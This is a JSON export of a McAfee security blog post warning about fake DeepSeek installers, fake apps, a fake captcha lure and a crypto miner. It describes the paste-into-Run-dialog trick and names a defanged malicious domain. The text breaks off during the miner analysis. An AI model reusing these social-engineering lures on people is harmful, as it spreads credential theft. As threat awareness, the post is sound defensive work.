{"id":209804,"date":"2025-03-17T00:00:41","date_gmt":"2025-03-17T07:00:41","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=209804"},"modified":"2025-03-17T13:57:34","modified_gmt":"2025-03-17T20:57:34","slug":"deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","title":{"rendered":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users"},"content":{"rendered":"<p><i><span data-contrast=\"auto\">Authored by Aayush Tyagi and M, Mohanasundaram<\/span><\/i><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<div>\n<p><b><span data-olk-copy-source=\"MessageBody\">*Bold = Term Defined in Appendix<\/span><\/b><\/p>\n<\/div>\n<div><\/div>\n<p><span class=\"TextRun SCXW212830337 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW212830337 BCX0\">In this blog, we discuss how malware authors recently utilized a popular new trend to entice unsuspecting users into installing malware. This blog is meant as a reminder to stay cautious during a hype cycle<\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">. 
<\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">It\u2019s a common trap for unwary consumers.<\/span><\/span><span class=\"EOP SCXW212830337 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<h2>Background<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210631\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM.png\" alt=\"\" width=\"1784\" height=\"528\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM.png 1784w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-300x89.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-1024x303.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-768x227.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-1536x455.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-205x61.png 205w\" sizes=\"auto, (max-width: 1784px) 100vw, 1784px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW211238534 BCX0\">Figure 1: DeepSeek Google Search 
Trend from 1<\/span><\/span><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><sup>st<\/sup> January to 7<sup>th<\/sup> March<\/span><\/strong><\/em><\/p>\n<p>Malware creators frequently piggyback on trending search terms, using hashtags and SEO manipulation to boost the visibility and search ranking of their pages. This tactic, known as SEO poisoning, drives traffic to malicious sites, increasing downloads or earning rewards through affiliate programs. Recently, &#8220;AI&#8221; (Artificial Intelligence) has been one of the most popular keywords leveraged in these scams. Earlier this year, &#8220;DeepSeek&#8221; also gained traction, at its peak surpassing &#8220;Nvidia&#8221; in search interest (Figure 1).<\/p>\n<p><span data-contrast=\"auto\">Let\u2019s look at how we got here. Artificial Intelligence (AI) tools are transforming the world at an unprecedented pace, right before our eyes. In recent years, we\u2019ve witnessed remarkable advancements in Generative AI, from the development of highly successful frontier LLMs (Large Language Models) such as ChatGPT, Gemini, LLaMA and Grok, to their applications as coding assistants (GitHub Copilot or Tabnine), meeting assistants, and voice cloning software, among the more popular ones. <\/span><\/p>\n<p><span data-contrast=\"auto\">These tools are pervasive and easily available at your fingertips. In today\u2019s world AI isn\u2019t just a complicated term used by select organizations; it has found its way into everyday household use in one way or another and is reshaping entire industries and economies. 
<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:720}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">With the good comes the bad: AI has also enabled an accelerated ecosystem of scammers who adopt these same tools, for example:<\/span><\/p>\n<ul>\n<li><span data-contrast=\"auto\">creating <\/span><a href=\"https:\/\/www.mcafee.com\/ai\/deepfake\/\"><span data-contrast=\"none\">deepfake<\/span><\/a><span data-contrast=\"auto\"> videos for fake propaganda or fake advertising<\/span><\/li>\n<li><span data-contrast=\"auto\">creating voice clones for \u201chey mum\u201d scams or <\/span><a href=\"https:\/\/www.mcafee.com\/content\/dam\/consumer\/en-us\/resources\/cybersecurity\/artificial-intelligence\/rp-beware-the-artificial-impostor-report.pdf\"><span data-contrast=\"none\">imposter<\/span><\/a><span data-contrast=\"auto\"> scam voicemails claiming to be from the IRS<\/span><\/li>\n<li><span data-contrast=\"auto\">generating near-perfect text and emails for social-engineering and phishing scams<\/span><\/li>\n<li><span data-contrast=\"auto\">generating <\/span><a href=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/how-social-media-is-spreading-l-a-misinformation-like-wildfire\/\"><span data-contrast=\"none\">images<\/span><\/a><span data-contrast=\"auto\"> that evoke sympathy for charity scams<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"auto\">Besides AI tools that empower scammers, there is the good old tactic of piggybacking on popular news trends<\/span><span data-contrast=\"auto\"><span style=\"box-sizing: border-box; margin: 0px; padding: 0px;\">, where popular 
search terms are used to bait unwary users (read our\u00a0<a href=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/scam-alert-fake-minecraft-roblox-hacks-on-youtube-hide-malware-target-kids\/\" target=\"_blank\" rel=\"noopener\">blog<\/a>\u00a0on how game cracks are used as lures to deliver malware). One such newsworthy term now being abused is\u00a0<a href=\"https:\/\/www.mcafee.com\/blogs\/privacy-identity-protection\/explaining-deepseek-the-ai-disruptor-thats-raising-red-flags-for-privacy-and-security\/\" target=\"_blank\" rel=\"noopener\"><em>DeepSeek,<\/em><\/a> which McAfee<\/span>\u00a0discussed earlier this year.<\/span><\/p>\n<h2 aria-level=\"2\"><span data-contrast=\"none\">Jumping on the DeepSeek-Hype Bandwagon<\/span><\/h2>\n<p><span data-contrast=\"auto\">The launch of the DeepSeek-R1 model (by DeepSeek, a Chinese company) generated significant buzz. DeepSeek claims the model was built, and can be run, at a fraction<sup>1<\/sup> of the cost of other generative AI models such as OpenAI&#8217;s GPT-4o or Meta&#8217;s Llama 3.1. Moreover, the R1 model was released in January 2025 under an open-source (MIT) license.<\/span><\/p>\n<p><span data-contrast=\"auto\">Within a few days of the release of the DeepSeek-R1 model, the DeepSeek AI assistant\u2014a chatbot app for the R1 model\u2014was launched on the Apple App Store and later the Google Play Store. In both app stores, DeepSeek\u2019s chatbot, an alternative to OpenAI&#8217;s ChatGPT, took the No. 1 spot and has been downloaded over 30 million times.<\/span><\/p>\n<p><span data-contrast=\"auto\">This stirred up the curiosity of many who wanted to experiment with the model. Interest spiked to the point where the DeepSeek website was unavailable at times due to the sheer volume of people trying to set up accounts or download the app. This mix of excitement, anxiety and impatience is exactly what scammers look for in their victims. Not long after the term went viral, scammers saw an opportunity and began distributing malware disguised as DeepSeek software. Various malware campaigns followed, including crypto miners, fake installers, DeepSeek impersonator websites and fake DeepSeek mobile apps.<\/span><\/p>\n<h2 aria-level=\"2\"><span data-contrast=\"none\">First Things First &#8211; Am I Protected?<\/span><\/h2>\n<p>At McAfee Labs, we work hard to keep you safe, but staying informed is always a smart move. When navigating trending news stories, it\u2019s important to stay cautious and take the necessary precautions. We continuously track emerging threats across multiple platforms\u2014including Windows, macOS, Android, iOS and ChromeOS\u2014to ensure our customers remain protected. While we do our part, don\u2019t forget to do yours: enable Scam Protection, Web Protection and Antivirus in your preferred security product.<\/p>\n<p>McAfee products offer <a href=\"https:\/\/www.mcafee.com\/en-us\/antivirus\/mcafee-total-protection.html\">advanced AI-powered protection<\/a> across all tiers\u2014Basic, Essential, Premium, Advanced, and Ultimate. 
Our AI-Suite includes features like AI-powered Antivirus, Text Scam Detection, Web Protection, VPN, and Identity Protection, providing comprehensive security.<\/p>\n<p>Check out <a href=\"https:\/\/www.mcafee.com\/blogs\/mcafee-news\/introducing-our-new-scam-detector\/\">McAfee Scam Detector<\/a>, which enhances our ability to combat a wide range of scams and is included in our products at no extra cost.<\/p>\n<p>For more tips on avoiding scams and staying safe online, visit the <a href=\"https:\/\/www.mcafee.com\/ai\">McAfee Smart AI Hub<\/a> at mcafee.ai. You can also explore the latest insights on the State of the Scamiverse on <a href=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/state-of-the-scamiverse\">McAfee\u2019s blog<\/a> and stay up to date on scam prevention strategies.<\/p>\n<p>Together, we can outsmart scammers and make the internet safer for everyone.<\/p>\n<h2><span data-contrast=\"none\">DeepSeek Malware Campaign Examples<\/span><\/h2>\n<p><span data-contrast=\"auto\">In the rest of this article, we walk through simple examples in more technical detail for readers who want the analysis.<\/span><\/p>\n<p><span data-contrast=\"auto\">McAfee Labs uncovered a variety of DeepSeek-themed malware campaigns that exploit its popularity and target tech-savvy users. Multiple malware families distributed their latest variants under the false pretense of being DeepSeek software.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209808\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM.png\" alt=\"\" width=\"1484\" height=\"776\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM.png 1484w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-300x157.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-1024x535.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-768x402.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-205x107.png 205w\" sizes=\"auto, (max-width: 1484px) 100vw, 1484px\" \/><\/p>\n<p style=\"text-align: center;\"><strong><i>Figure 2: Attack Vector<\/i><\/strong><\/p>\n<p><span data-contrast=\"auto\">Users run into these threats while searching the internet for information about DeepSeek AI: they encounter websites offering DeepSeek installers for different platforms, such as Android, Windows and Mac. McAfee Labs found that a number of these installers were trojanized or simply repackaged applications. We identified multiple instances of keyloggers, crypto miners, password stealers and trojan downloaders being distributed as DeepSeek installers.<\/span><\/p>\n<h3><span data-contrast=\"none\">Example 1: Fake Installers and Fake Android Apps<\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210646\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM.png\" alt=\"\" width=\"1900\" height=\"564\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM.png 1900w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-300x89.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-1024x304.png 1024w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-768x228.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-1536x456.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-205x61.png 205w\" sizes=\"auto, (max-width: 1900px) 100vw, 1900px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong>Figure 3: DeepSeek Installers<\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">Figure 3 shows fake installers that actually distribute third-party software, such as winManager (highlighted in red) and Audacity (highlighted in blue).<\/span><\/p>\n<p><span data-contrast=\"auto\">In the simplest abuse of the DeepSeek name, certain affiliates were able to spike their partner downloads and collect commissions from pay-per-install partner programs. Rogue affiliates use this tactic to generate revenue through forced installations of partner software.<\/span><\/p>\n<p><span data-contrast=\"auto\">Similar installers were also observed using the DeepSeek icon to appear more believable, or alternatively serving click ads and modifying browser settings (such as the default search engine) to generate additional ad revenue.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210661\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM.png\" alt=\"\" width=\"1920\" height=\"698\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM.png 1920w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-300x109.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-1024x372.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-768x279.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-1536x558.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-205x75.png 205w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW89261413 BCX0\">Figure 4: <\/span><span class=\"NormalTextRun 
SpellingErrorV2Themed SCXW89261413 BCX0\">winManager<\/span><span class=\"NormalTextRun SCXW89261413 BCX0\"> (left) and Audacity (right)<\/span><\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">The DeepSeek icon was also misused by multiple Android applications to deceive users into downloading unrelated apps, thereby inflating download counts and generating revenue.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210676\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM.png\" alt=\"\" width=\"1814\" height=\"724\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM.png 1814w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-300x120.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-1024x409.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-768x307.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-1536x613.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-205x82.png 205w\" sizes=\"auto, (max-width: 1814px) 100vw, 1814px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong>Figure 5: Android files abusing DeepSeek\u2019s logo<\/strong><\/em><\/p>\n<h3><span data-contrast=\"none\">Example 2: Fake Captcha Page<\/span><\/h3>\n<p><span data-contrast=\"auto\">We also encountered DeepSeek-themed fake captcha pages. This isn\u2019t new: it has been a popular technique, used as recently as six months ago by <\/span><a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/behind-the-captcha-a-clever-gateway-of-malware\/\"><span data-contrast=\"none\">LummaStealer<\/span><\/a><span data-contrast=\"auto\">.<\/span><\/p>\n<p><span data-contrast=\"auto\">A fake captcha is a webpage that asks users to verify that they are human but instead tricks them into downloading and executing malicious software. 
This malware can steal login credentials, browser data and more.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210691\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM.png\" alt=\"\" width=\"1408\" height=\"792\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM.png 1408w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-300x169.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-1024x576.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-768x432.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-205x115.png 205w\" sizes=\"auto, (max-width: 1408px) 100vw, 1408px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong>Figure 6: Fake Captcha Page<\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">In this instance, the website deepseekcaptcha[.]top pretends to offer a partnership program for content creators. It uses a technique called brand impersonation, copying DeepSeek\u2019s icons and color scheme to pass as the official website.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210706\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM.png\" alt=\"\" width=\"1800\" height=\"858\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM.png 1800w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-300x143.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-1024x488.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-768x366.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-1536x732.png 1536w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-205x98.png 205w\" sizes=\"auto, (max-width: 1800px) 100vw, 1800px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW183942435 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW183942435 BCX0\">7<\/span><span class=\"NormalTextRun SCXW183942435 BCX0\">: <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW183942435 BCX0\">deepseekcaptcha<\/span><span class=\"NormalTextRun SCXW183942435 BCX0\">[.]top<\/span><\/strong><\/em><\/p>\n<p><span class=\"TextRun SCXW53749430 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW53749430 BCX0\">Once the user registers for the program, <\/span><span class=\"NormalTextRun SCXW53749430 BCX0\">they\u2019re<\/span><span class=\"NormalTextRun SCXW53749430 BCX0\"> redirected to the fake captcha page.<\/span><\/span><span class=\"EOP SCXW53749430 BCX0\" data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210049\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM.png\" alt=\"\" width=\"1540\" height=\"674\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM.png 1540w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-300x131.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-1024x448.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-768x336.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-1536x672.png 1536w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-205x90.png 205w\" sizes=\"auto, (max-width: 1540px) 100vw, 1540px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW240051701 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW240051701 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW240051701 BCX0\">8<\/span><span class=\"NormalTextRun SCXW240051701 BCX0\">: Fake Captcha Page hosted on the website<\/span><\/span><span class=\"EOP SCXW240051701 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">Here, as shown above, to authenticate, the user is asked to open the verification window by pressing the Windows + R key and then pressing CTRL + V to verify their identity.\u00a0<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The user would observe a screen as shown in figure 9.\u00a0<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210064\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM.png\" alt=\"\" width=\"960\" height=\"500\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM.png 960w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM-300x156.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM-768x400.png 768w, 
https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM-205x107.png 205w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW58316558 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW58316558 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW58316558 BCX0\">9<\/span><span class=\"NormalTextRun SCXW58316558 BCX0\">: Windows Run panel after copying the CMD<\/span><\/span><span class=\"EOP SCXW58316558 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">On clicking \u2018OK\u2019, malware will be installed that can steal browser and financial information from the system.<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><a href=\"https:\/\/www.mcafee.com\/en-us\/safe-browser\/mcafee-webadvisor.html\"><span data-contrast=\"none\">McAfee\u2019s Web Advisor<\/span><\/a><span data-contrast=\"auto\"> protects against such threats. In this instance, the fake captcha page was blocked and marked as suspicious before it could be accessed. 
Even if you aren\u2019t a McAfee customer, check out the browser plugin for free.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210109\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM.png\" alt=\"\" width=\"1376\" height=\"740\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM.png 1376w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-300x161.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-1024x551.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-768x413.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-205x110.png 205w\" sizes=\"auto, (max-width: 1376px) 100vw, 1376px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW26711753 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW26711753 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW26711753 BCX0\">10<\/span><span class=\"NormalTextRun SCXW26711753 BCX0\">: McAfee blocking malicious URL<\/span><\/span><span class=\"EOP SCXW26711753 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<h3><span class=\"TextRun SCXW237261729 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">Example <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">3<\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" 
data-ccp-parastyle=\"heading 3\">: <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">Technical Analysis <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">o<\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">f <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">a <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">Crypto Miner<\/span><\/span><span class=\"EOP SCXW237261729 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">In this section, we discuss a <strong>*<\/strong><\/span><strong>Cryptominer<\/strong><span data-contrast=\"auto\"> malware that was masquerading as DeepSeek. By blocking this initial payload, we prevent a chain of events (Fig. 11) on the computer that would have reduced the device\u2019s performance and potentially exposed it to further infection attempts.<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Some example names used by the initial loader were:<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">DeepSeek-VL2.Developer.Edition.exe<\/span><span 
